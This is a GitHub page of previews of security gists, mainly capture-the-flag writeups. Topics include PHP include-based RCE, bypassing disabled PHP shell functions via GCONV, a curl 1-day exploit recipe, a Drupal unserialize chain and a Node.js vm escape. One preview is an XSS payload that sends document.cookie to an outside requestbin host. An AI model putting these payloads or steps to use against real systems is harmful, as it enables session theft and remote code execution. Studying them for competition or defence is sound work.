Skip to content

Instantly share code, notes, and snippets.

View wupco's full-sized avatar
💭
On vacation

{{1+1}} wupco

💭
On vacation
597 followers · 103 following
View GitHub Profile
@terjanq
terjanq / README.md
Last active October 4, 2023 10:36
Postviewer challenge writeup from GoogleCTF 2022

Postviewer - writeup

Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of an all client-side simple page, i.e. no backend code was involved. A user can upload any file which will be then locally stored in indexedDB. They can preview their files by either clicking on the title or by visiting file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from data: URL. The rendering occurs by sending file's contents to the iframe via postMessage({ body, mimeType }, '*')

Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@birdg0
birdg0 / solve.c
Last active September 27, 2020 09:25
Official solution for "Shoplifters" of 0CTF/TCTF 2020 Finals
/*
gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf
objcopy -Obinary -j .text solve.elf solve.bin
Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c,
https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c
and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c
*/
#include <stdio.h>
#include <stdlib.h>
@shinh
shinh / gen_el_lua_py2_jvm.rb
Last active December 26, 2020 18:15
bytecode polyglot - def con qual 2020 bytecoooding
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
@random-robbie
random-robbie / shell_exec.txt
Created March 25, 2020 14:20
wordpress plugins with shell_exec in them.
10web-manager
4k-icon-fonts-for-visual-composer
accelerated-mobile-pages
accept-payments-wp
accu-auto-backup
ace-edit
ace-editor-for-wp
aceide
acelerator
acf-code-field
@LoadLow
LoadLow / Readme.md
Last active August 14, 2023 13:55
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv, in php, in order to execute the same payload.

Uses cases :

  • You control the first parameter of iconv (in_charset), you can set an env var and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
  • You have a php RCE but system, shell_exec, curl_exec and other functions are disabled but you can setenv (and LD_PRELOAD is blacklisted).
@PaulCher
PaulCher / _readme.md
Last active July 23, 2023 15:01
curl 1-day exploit
  1. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
  2. Update ip addresses at the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
@paul-axe
paul-axe / insomnihack2019teaser_droops_writeup.md
Created January 20, 2019 12:42
insomnihack2019teaser_droops_writeup.md

The challenge was based on drupal7 with obvious unserialize call added.

Trying to build a chain and the first solution i found was based on following chain:

./includes/bootstrap.inc

abstract class DrupalCacheArray
    ...
    public function __destruct() {
        $data = array();
@tyage
tyage / h4x0rs.date
Created May 29, 2018 03:23
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
@jcreedcmu
jcreedcmu / escape.js
Created February 19, 2018 18:09
Escaping nodejs vm
////////
// The vm module lets you run a string containing javascript code 'in
// a sandbox', where you specify a context of global variables that
// exist for the duration of its execution. This works more or less
// well, and if you're in control of the code that's running, and you
// have a reasonable protocol in mind// for how it expects a certain
// context to exist and interacts with it --- like, maybe a plug-in
// API for a program, with some endpoints defined for it that do
// useful domain-specific things --- your life can go smoothly.